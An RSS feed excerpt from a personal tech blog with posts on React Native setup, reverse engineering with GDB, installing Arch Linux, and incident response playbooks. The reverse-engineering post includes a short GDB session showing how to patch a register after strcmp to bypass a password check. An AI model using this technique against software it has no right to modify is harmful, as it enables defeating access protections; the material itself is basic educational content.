<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1704893859802/221b837c-ceb4-4b55-8ac3-fa5889b9b815.png" alt class="image--center mx-auto" /></p>
<ul>
<li><p>After installing those tools, you need to add the path of Android Studio and its SDK files to your <mark>~/.</mark><strong><mark>bashrc</mark></strong>; copy the following lines into your ~/.bashrc</p>
<pre><code class="lang-bash">  <span class="hljs-built_in">export</span> ANDROID_HOME=<span class="hljs-variable">$HOME</span>/Android/Sdk
  <span class="hljs-built_in">export</span> PATH=<span class="hljs-variable">$PATH</span>:<span class="hljs-variable">$ANDROID_HOME</span>/emulator
  <span class="hljs-built_in">export</span> PATH=<span class="hljs-variable">$PATH</span>:<span class="hljs-variable">$ANDROID_HOME</span>/platform-tools
</code></pre>
</li>
<li><p>After adding the paths and completing the installation of Node and Java, you can now create a <strong>react-native</strong> project by typing the following command.</p>
<pre><code class="lang-bash">  <span class="hljs-comment"># Before writing this command you need to get into the</span>
  <span class="hljs-comment"># directory of your liking and then use the following command</span>
  npx react-native@latest init AwesomeProject
</code></pre>
</li>
<li><p>Now you need to open <strong>Android Studio</strong> with the folder you created with the command above, select the android folder from it as shown in the image below, click <mark>OK</mark>, and let Android Studio build the Gradle project (<strong><mark>the Gradle build will take some time, be patient</mark></strong>).</p>
<p>  <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1704894940608/4740a103-9d35-424a-8391-cb40822629df.png" alt class="image--center mx-auto" /></p>
</li>
<li><p><strong><mark>After the Gradle build it will take some time to finish indexing; don't close Android Studio right after the Gradle build, or the app may crash.</mark></strong></p>
</li>
</ul>
<h3 id="heading-your-setup-for-react-native-has-been-done-for-debian-based-distros">Your React Native setup for Debian-based distros is now done</h3>
<p><strong>Now you can simply get into your directory and type</strong></p>
<pre><code class="lang-bash"><span class="hljs-comment"># Please use this command only after getting into your project directory; it must contain a file named package.json</span>
 npm start
</code></pre>
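<p>Before running the app, you can optionally sanity-check the whole environment; React Native ships a <code>doctor</code> command that reports whether Node, the JDK, and the Android SDK are correctly visible.</p>
<pre><code class="lang-bash">npx react-native doctor   # reports missing or misconfigured dependencies
</code></pre>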
<h2 id="heading-enjoy">Enjoy!!!</h2>
]]></content:encoded></item><item><title><![CDATA[🦾 Reverse engineering code with Assembly]]></title><description><![CDATA[CPU Registers
Registers is a small amount of fast storage element into the processor. It is faster than cache memory due to the smaller size and proximity with the CPU itself.
We will use the GDB or GNU Debugger for demonstration purposes here.
(gdb)...]]></description><link>https://blog.berzi.one/reverse-engineering-code-with-assembly</link><guid isPermaLink="true">https://blog.berzi.one/reverse-engineering-code-with-assembly</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Thu, 04 Jan 2024 14:33:04 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1704378768242/ce6ac4f7-602a-4336-86e4-4070f20a024c.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h3 id="heading-cpu-registers">CPU Registers</h3>
<p>A register is a small, fast storage element inside the processor. Registers are faster than cache memory due to their smaller size and proximity to the CPU itself.</p>
<p>We will use the <code>GDB</code> or GNU Debugger for demonstration purposes here.</p>
<pre><code class="lang-plaintext">(gdb) info registers
rax            0x0          0
rbx            0x7fffffffe3c8      140737488348104
rcx            0x7ffff7f9a680      140737353721472
rdx            0x7fffffffe3d8      140737488348120
rsi            0x7fffffffe3c8      140737488348104
rdi            0x1                 1
rbp            0x7fffffffe2b0      0x7fffffffe2b0
rsp            0x7fffffffe2b0      0x7fffffffe2b0
</code></pre>
<p>Here, <code>rax</code> is a register, whose value is 0 at the moment.</p>
<h3 id="heading-understanding-assembly-skim-perspective">Understanding Assembly (skim-perspective)</h3>
<p>All code, once fully compiled/interpreted, is ultimately converted into machine code, which assembly language represents in readable form. Although it is quite difficult to understand, we can point out certain patterns in it. Let's take a look at this assembly dump:</p>
<pre><code class="lang-plaintext">  (gdb) disassemble main
   0x00000000004005ea &lt;+45&gt;:    call   0x400490 &lt;printf@plt&gt;
   0x00000000004005ef &lt;+50&gt;:    mov    -0x10(%rbp),%rax
   0x00000000004005f3 &lt;+54&gt;:    add    $0x8,%rax
   0x00000000004005f7 &lt;+58&gt;:    mov    (%rax),%rax
   0x00000000004005fa &lt;+61&gt;:    mov    $0x4006da,%esi
   0x00000000004005ff &lt;+66&gt;:    mov    %rax,%rdi
   0x0000000000400602 &lt;+69&gt;:    call   0x4004b0 &lt;strcmp@plt&gt;
   0x0000000000400607 &lt;+74&gt;:    test   %eax,%eax
   0x0000000000400609 &lt;+76&gt;:    jne    0x400617 &lt;main+90&gt;
   0x000000000040060b &lt;+78&gt;:    mov    $0x4006ea,%edi
   0x0000000000400610 &lt;+83&gt;:    call   0x400480 &lt;puts@plt&gt;
   0x0000000000400615 &lt;+88&gt;:    jmp    0x40062d &lt;main+112&gt;
</code></pre>
<p>In here, at the <code>0x00000000004005ea</code> or the <code>5ea</code> line location/memory address, the <code>&lt;printf@plt&gt;</code> statement basically means that a <code>printf()</code> function is being <code>call</code>ed.</p>
<p>When we look at the manual for the <code>printf()</code> statement, it means that some message is being printed on the console.</p>
<p>Hence, we can conclude that one does not need to know assembly in depth to understand its code.</p>
<h3 id="heading-constructing-control-flow-and-branches">Constructing control flow and branches</h3>
<p>Let's take a look at this particular section from the assembly dump:</p>
<pre><code class="lang-plaintext">   0x0000000000400602 &lt;+69&gt;:    call   0x4004b0 &lt;strcmp@plt&gt;
   0x0000000000400607 &lt;+74&gt;:    test   %eax,%eax
   0x0000000000400609 &lt;+76&gt;:    jne    0x400617 &lt;main+90&gt;
</code></pre>
<p>A call to <code>strcmp()</code> means two strings are being compared (according to its definition) and checked for equality. In <code>0x0000000000400607 &lt;+74&gt;: test %eax,%eax</code>, we are checking the value of the register <code>eax</code>, which denotes the lower 32 bits of the 64-bit register <code>rax</code> we encountered in the output displayed at the top in 'CPU Registers'.</p>
<p>In the last line, the <code>jne</code> instruction stands for "jump if not equal", i.e. jump when the tested value is non-zero, with the target being the memory address <code>main+90</code>.</p>
<p>Just like that, we can construct a diagram or flowchart for the control flow of the entire program:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1704378062323/3fa48c86-2a9d-4d4c-a9e7-215b3e909864.png" alt class="image--center mx-auto" /></p>
<blockquote>
<p>(please note that this is not accurate or usable code)</p>
</blockquote>
<h3 id="heading-cracking">Cracking</h3>
<p>Cracking is the process of breaking into and executing protected portions of code. It is considered a part of reverse-engineering.</p>
<p>From the previous topic, we can easily inspect register values and move the control flow pointer, or <code>rip</code>, to the particular location of code we wish to access. In the given section, we can set <code>eax</code> to 0 through GDB or a similar debugger to make the program believe that <code>strcmp</code> returned 0, i.e. that the strings matched. When we continue the program from that breakpoint, we will be able to access the portion of code that only runs when <code>strcmp</code> returns 0.</p>
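<p>As a rough sketch (assuming a hypothetical binary named <code>./program</code> and the addresses from the dump above), such a GDB session could look like this:</p>
<pre><code class="lang-plaintext">$ gdb ./program
(gdb) break *0x0000000000400607    # stop right after the call to strcmp
(gdb) run
(gdb) set $eax = 0                 # pretend strcmp returned 0 (strings matched)
(gdb) continue                     # execution now falls through to the protected code
</code></pre>
<p>The breakpoint address and binary name are placeholders; in practice you take them from your own disassembly.</p>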
<p>How can we relate this to a real-life example? Password-protected applications are the key: patching a register in exactly this way can bypass a password check.</p>
<h3 id="heading-some-extra-reads">Some extra reads:</h3>
<ul>
<li><p><a target="_blank" href="https://ee.hawaii.edu/~tep/EE160/Book/chap14/subsection2.1.1.2.html">https://ee.hawaii.edu/~tep/EE160/Book/chap14/subsection2.1.1.2.html</a></p>
</li>
<li><p><a target="_blank" href="https://www.geeksforgeeks.org/gdb-step-by-step-introduction/">https://www.geeksforgeeks.org/gdb-step-by-step-introduction/</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[🛠️ Setting up Arch]]></title><description><![CDATA[Downloading the ISO
An ISO is an image of the operating system. It acts as the installer for the operating system.
The ISO can be downloaded from one of ArchLinux's global mirrors, and flashed to create a bootable USB.
Setting up Ventoy: Flashing mul...]]></description><link>https://blog.berzi.one/setting-up-arch</link><guid isPermaLink="true">https://blog.berzi.one/setting-up-arch</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Sun, 31 Dec 2023 14:12:46 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1704031220421/19673a27-a88f-437f-ae4a-70ff97fb9809.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-downloading-the-iso">Downloading the ISO</h2>
<p>An ISO is an image of the operating system. It acts as the installer for the operating system.</p>
<p>The ISO can be downloaded from one of ArchLinux's global mirrors, and flashed to create a bootable USB.</p>
<h3 id="heading-setting-up-ventoy-flashing-multiple-isos-to-one-usb">Setting up Ventoy: Flashing multiple ISOs to one USB</h3>
<p>Just to be safe, we will use Ventoy to flash at least two different ISOs to our USB stick, so that if installing Arch is not possible for some reason, we can always install some other Linux distribution instead. This fallback is rarely needed, but it costs nothing since Ventoy lets the stick hold multiple ISOs side by side.</p>
<p>Link to installing: <a target="_blank" href="https://github.com/ventoy/Ventoy">Ventoy</a></p>
<p>Let's assume that we are already on a Linux distribution (If you are on Windows, please follow <a target="_blank" href="https://www.ventoy.net/en/doc_start.html">this guide</a> ). After we install the Ventoy binary, we will run it with this command:</p>
<pre><code class="lang-bash">$ sh Ventoy2Disk.sh -i /dev/sdX
</code></pre>
<p>where <code>/dev/sdX</code> is the device file name for our USB; we can find it with the <code>fdisk -l</code> command.</p>
<p>After Ventoy is installed, we can simply drag and drop our ArchLinux ISO into our flash drive's directory.</p>
<h2 id="heading-diving-into-arch-first-boot">Diving into Arch: First boot</h2>
<p>We will be greeted with a command line after we select the first option from the boot loader.</p>
<p><img src="https://imageio.forbes.com/blogs-images/jasonevangelho/files/2019/06/arch-script-e1560162541576.png?format=png&amp;height=600&amp;width=1200&amp;fit=bounds" alt="Arch Linux OS Challenge: Install Arch 'The Easy Way' With These 2  Alternative Methods" /></p>
<h3 id="heading-connecting-wi-fi">Connecting wi-fi</h3>
<p>In most cases of a home computer, we may not have an ethernet cable laying around, so, we will connect our computer to wi-fi with <code>iwctl</code> utility.</p>
<p>Simply typing <code>iwctl</code> will open the <code>iwd</code> shell prompt. From here we must type the following command to view all our network devices:</p>
<pre><code class="lang-bash">[iwd]# device list
</code></pre>
<p>After noting our device name, we make it scan for active wi-fi networks and display them:</p>
<pre><code class="lang-bash">[iwd]# station &lt;device_name&gt; scan
[iwd]# station &lt;device_name&gt; get-networks
</code></pre>
<p>Then select and connect to the network:</p>
<pre><code class="lang-bash">$ [iwd]: station &lt;device_name&gt; connect &lt;wifi_name&gt;
</code></pre>
<p>We will be asked to enter the password for that <code>SSID</code>. After we connect, we can optionally test the connection with the <code>ping</code> command (press <code>CTRL-C</code> to stop pinging).</p>
<h2 id="heading-partitioning-drives">Partitioning drives</h2>
<p>We will use the <code>cfdisk</code> utility to edit our drive partitions.</p>
<pre><code class="lang-bash">$ cfdisk /dev/sdY
</code></pre>
<p>Here, <code>/dev/sdY</code> is the device file name for the drive whose partitions we want to edit. We will assume that we are clean-installing Arch on the entire drive.</p>
<p><img src="https://upload.wikimedia.org/wikipedia/commons/8/85/Cfdisk_screenshot.png" alt="cfdisk - Wikipedia" /></p>
<p>In order to delete existing partitions, we will simply hover over each partition with the arrow keys and select <code>Delete</code>.</p>
<p>After we select <code>Write</code> and confirm, the old layout is gone. Let's create our new partitions now.</p>
<p>We will select <code>New</code>, then give the first partition a size of <code>100M</code>, meaning 100 megabytes; this will house the boot loader for our distribution.</p>
<p>After pressing enter, we will hover back to the <code>free space</code> and repeat the process, this time with a size of <code>4G</code>. This will house the <code>swap</code> for our distribution: the part of the drive that can be used as extra memory in case our RAM fills up.</p>
<p>Lastly, we will select the free space and accept the default suggested size, which is all of the remaining drive. This will house our files.</p>
<p>When everything looks right, select <code>Write</code>, type <code>yes</code> to confirm, and then <code>Quit</code>.</p>
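<p>For reference, recent versions of <code>sfdisk</code> can script the same layout non-interactively (a hedged sketch, not part of the interactive walkthrough above; <code>/dev/sdY</code> is a placeholder, and this wipes the drive):</p>
<pre><code class="lang-bash">$ sfdisk /dev/sdY &lt;&lt;'EOF'
label: gpt
size=100M, type=uefi
size=4G,   type=swap
type=linux
EOF
</code></pre>
<p>The <code>uefi</code>, <code>swap</code>, and <code>linux</code> type aliases require util-linux 2.36 or newer; older versions need the raw partition-type GUIDs instead.</p>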
<h2 id="heading-building-and-mounting-file-systems">Building and mounting file systems</h2>
<p>We can know our partition names and size from the <code>lsblk</code> command.</p>
<pre><code class="lang-bash">$ mkfs.fat -F 32 &lt;boot_partition&gt;
$ mkswap &lt;swap_partition&gt;
$ mkfs.btrfs &lt;storage_partition&gt;
</code></pre>
<p>Here, we are using the <code>FAT32</code>, swap, and <code>btrfs</code> file systems for our partitions. These are among the most common and well-supported choices for each partition's role.</p>
<p>After that, we will mount or make the file systems accessible from Arch.</p>
<pre><code class="lang-bash">$ mount &lt;storage_partition&gt; /mnt
$ mkdir -p /mnt/boot/efi
$ mount &lt;boot_partition&gt; /mnt/boot/efi
$ swapon &lt;swap_partition&gt;
</code></pre>
<p>Here, we mount the root (storage) partition first, then create the nested <code>boot/efi</code> directory inside it to hold the boot partition. If we mounted the boot partition before the root partition, mounting root at <code>/mnt</code> would hide it.</p>
<p>Finally, <code>swapon</code> activates the swap partition.</p>
<h2 id="heading-installing-essential-packages">Installing essential packages</h2>
<p>Now, we are ready to install the core packages of our system.</p>
<pre><code class="lang-bash">$ pacstrap -K /mnt base linux linux-firmware sof-firmware base-devel nano networkmanager grub
</code></pre>
<p>We are installing the base system and Linux kernel, firmware (including sound-card firmware for newer systems), build tools, a network manager, the GRUB boot loader, and a text editor for editing system config files.</p>
<h3 id="heading-generating-the-fstab-file">Generating the fstab file</h3>
<pre><code class="lang-bash">$ genfstab -U /mnt &gt;&gt; /mnt/etc/fstab
</code></pre>
<p><code>fstab</code> is our Linux system's filesystem table: a configuration table designed <strong>to ease the burden of mounting and unmounting file systems on a machine</strong>.</p>
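<p>For illustration, a generated <code>fstab</code> for our layout would contain entries along these lines (the UUIDs and mount options shown here are placeholders, not real values):</p>
<pre><code class="lang-plaintext"># &lt;file system&gt;   &lt;dir&gt;       &lt;type&gt;  &lt;options&gt;    &lt;dump&gt; &lt;pass&gt;
UUID=xxxxxxxx-...   /           btrfs   rw,relatime  0      0
UUID=XXXX-XXXX      /boot/efi   vfat    rw,...       0      2
UUID=xxxxxxxx-...   none        swap    defaults     0      0
</code></pre>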
<p>Time to enter our newly installed arch system:</p>
<pre><code class="lang-bash">$ arch-chroot /mnt
</code></pre>
<h2 id="heading-system-configurations">System configurations</h2>
<p>We can set the time zone with the following command</p>
<pre><code class="lang-bash">$ ln -sf /usr/share/zoneinfo/Region/City /etc/localtime
$ hwclock --systohc
</code></pre>
<p>where <code>Region/City</code> is your region (press TAB to autocomplete as you go). The second command sets the hardware clock from the system clock.</p>
<p>Next we generate locales: general language and encoding settings used by all or most programs. First uncomment your locale (e.g. <code>en_US.UTF-8 UTF-8</code>) in <code>/etc/locale.gen</code> using <code>nano</code>, then run:</p>
<pre><code class="lang-bash">$ locale-gen
$ <span class="hljs-built_in">echo</span> <span class="hljs-string">'LANG=en_US.UTF-8'</span> &gt; /etc/locale.conf
$ <span class="hljs-built_in">echo</span> <span class="hljs-string">'KEYMAP=us'</span> &gt; /etc/vconsole.conf
</code></pre>
<p>Creating the hostname file for our system</p>
<pre><code class="lang-bash">$ <span class="hljs-built_in">echo</span> <span class="hljs-string">'&lt;hostname&gt;'</span> &gt; /etc/hostname
</code></pre>
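<p>Optionally, we can add matching entries to <code>/etc/hosts</code> (replace <code>&lt;hostname&gt;</code> with the name chosen above; the <code>127.0.1.1</code> line is a common convention rather than a strict requirement):</p>
<pre><code class="lang-bash">$ cat &gt;&gt; /etc/hosts &lt;&lt; 'EOF'
127.0.0.1   localhost
::1         localhost
127.0.1.1   &lt;hostname&gt;
EOF
</code></pre>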
<h2 id="heading-root-and-user-configuration">Root and User configuration</h2>
<pre><code class="lang-bash">$ passwd
$ useradd -m -G wheel &lt;username&gt;
$ passwd &lt;username&gt;
</code></pre>
<p>This will prompt us for the root password. Then create a user and add it to the group <code>wheel</code>. Lastly we will set the password for this user.</p>
<p>It's time to add root privileges to this user.</p>
<pre><code class="lang-bash">$ EDITOR=nano visudo
</code></pre>
<p>Over here, we will look for the line:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># %wheel ALL=(ALL:ALL) ALL</span>
</code></pre>
<p>We will uncomment this line (remove the leading <code>#</code>) to give all users in the <code>wheel</code> group root privileges via <code>sudo</code>. Save and exit nano with <code>CTRL+X</code>, then <code>Y</code>, then <code>Enter</code>.</p>
<p>Update the packages:</p>
<pre><code class="lang-bash">$ pacman -Syu
</code></pre>
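<p>Since we installed <code>networkmanager</code> but its service is not enabled by default, it is worth enabling it now so networking works after the reboot:</p>
<pre><code class="lang-bash">$ systemctl enable NetworkManager
</code></pre>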
<h2 id="heading-installing-grub-boot-loader">Installing GRUB boot-loader</h2>
<pre><code class="lang-bash">$ grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=GRUB
$ grub-mkconfig -o /boot/grub/grub.cfg
</code></pre>
<p>Since we created and mounted an EFI partition, this installs GRUB for a UEFI system and then generates its configuration file. (If <code>grub-install</code> complains about a missing <code>efibootmgr</code>, install it first with <code>pacman -S efibootmgr</code>.) On a legacy BIOS system, we would instead run <code>grub-install &lt;drive_name&gt;</code>, replacing <code>&lt;drive_name&gt;</code> with the device file name for our drive (not a partition), followed by the same <code>grub-mkconfig</code> command.</p>
<h2 id="heading-finishing-steps">Finishing steps</h2>
<p>We will exit the chroot, unmount the <code>/mnt</code> directory, and reboot into our new system!</p>
<pre><code class="lang-bash">$ exit
$ umount -R /mnt
$ reboot
</code></pre>
<p>Please remove the USB once the screen goes blank after the <code>reboot</code> command. We now boot into a fresh install of ArchLinux!</p>
<p>Log in with the user we created. If you are using this machine as a daily driver, it is advisable to install a desktop environment like <code>GNOME</code>. Welcome!</p>
<h2 id="heading-some-extra-reads">Some extra reads:</h2>
<ul>
<li><p><a target="_blank" href="https://wiki.archlinux.org/title/installation_guide">https://wiki.archlinux.org/title/installation_guide</a></p>
</li>
<li><p><a target="_blank" href="https://www.ventoy.net/en/doc_start.html">https://www.ventoy.net/</a></p>
</li>
<li><p><a target="_blank" href="https://guese-justin.medium.com/installing-arch-linux-the-easy-way-with-encrypted-drives-for-deep-learning-83fd55035ff7">https://guese-justin.medium.com/installing-arch-linux-the-easy-way-with-encrypted-drives-for-deep-learning-83fd55035ff7</a></p>
</li>
<li><p><a target="_blank" href="https://www.sciencedirect.com/topics/computer-science/boot-partition">https://www.sciencedirect.com/topics/computer-science/boot-partition</a></p>
</li>
<li><p><a target="_blank" href="https://docs.oracle.com/cd/E19253-01/817-2521/overview-39/index.html">https://docs.oracle.com/cd/E19253-01/817-2521/overview-39/index.html</a></p>
</li>
<li><p><a target="_blank" href="https://wiki.archlinux.org/title/Linux_console/Keyboard_configuration">https://wiki.archlinux.org/title/Linux_console/Keyboard_configuration</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[📕 Blue Team: Playbooks]]></title><description><![CDATA[A cybersecurity playbook is a guidebook that keeps getting updated with lessons learnt post-incident. It is a comprehensive roadmap on how to deal with attacks revolving around specific concepts like spyware, SQL injection, etc. However, they have sp...]]></description><link>https://blog.berzi.one/blue-team-playbooks</link><guid isPermaLink="true">https://blog.berzi.one/blue-team-playbooks</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Wed, 27 Dec 2023 17:10:49 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1703694285138/32165e24-0355-49d8-bfa3-abd3ab1df245.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>A cybersecurity playbook is a guidebook that keeps getting updated with lessons learnt post-incident. It is a comprehensive roadmap on how to deal with attacks revolving around specific concepts like spyware, SQL injection, etc. However, they have specific rules as to how and on what grounds they are allowed to be updated which varies among firms.</p>
<p><img src="https://www.fortinet.com/blog/ciso-collective/incident-response-plans-playbooks-policy/_jcr_content/root/responsivegrid/table_content/par/image.img.png/1702704276344/fortinet-incident-response-policy-playbook-diagram.png" alt="Fortinet diagram on incident response, policy, and playbooks." /></p>
<h4 id="heading-incident-response-plan-vs-incident-response-playbook">Incident Response plan vs. Incident Response playbook</h4>
<p>Incident response plans are summarized steps on how to deal with an incident, while playbooks are more elaborate guides that help refine the response to a specific security concern.</p>
<h4 id="heading-phases-of-incident-response-security-playbooks">Phases of Incident response security playbooks</h4>
<ul>
<li><p>Prepare: Work to establish a strong security posture to avoid incidents, create security playbooks, train personnel, and run security-breach drills.</p>
</li>
<li><p>Detection and analysis: Use SIEM (Security Information and Event Management), IDS (Intrusion Detection System), or IPS (Intrusion Prevention System) tools to monitor metrics (factors like response times, failure rates, etc.), detect, and confirm breaches. Investigate the source of the breach.</p>
</li>
<li><p>Containment: Take immediate measures to reduce further damage to organizational assets and take measures to neutralize the threat as much as possible.</p>
</li>
<li><p>Eradication and Recovery: Restore damaged assets, document the incident and update the playbook.</p>
</li>
<li><p>Collaboration: Let the concerned security team and higher authorities in the organization know about the incident.</p>
</li>
</ul>
<p>Security playbooks are essential guides that are updated through incidents and security audits. They provide a structured pathway for a security analyst to respond to an incident.</p>
<h3 id="heading-some-extra-reads">Some extra reads:</h3>
<ul>
<li><p><a target="_blank" href="https://www.cyber.gov.au/sites/default/files/2023-03/ACSC%20Cyber%20Incident%20Response%20Plan%20Guidance_A4.pdf">https://www.cyber.gov.au/sites/default/files/2023-03/ACSC%20Cyber%20Incident%20Response%20Plan%20Guidance_A4.pdf</a></p>
</li>
<li><p><a target="_blank" href="https://www.cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf">https://www.cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf</a></p>
</li>
<li><p><a target="_blank" href="https://learn.microsoft.com/en-us/security/operations/incident-response-playbooks">https://learn.microsoft.com/en-us/security/operations/incident-response-playbooks</a></p>
</li>
</ul>
]]></content:encoded></item></channel></rss>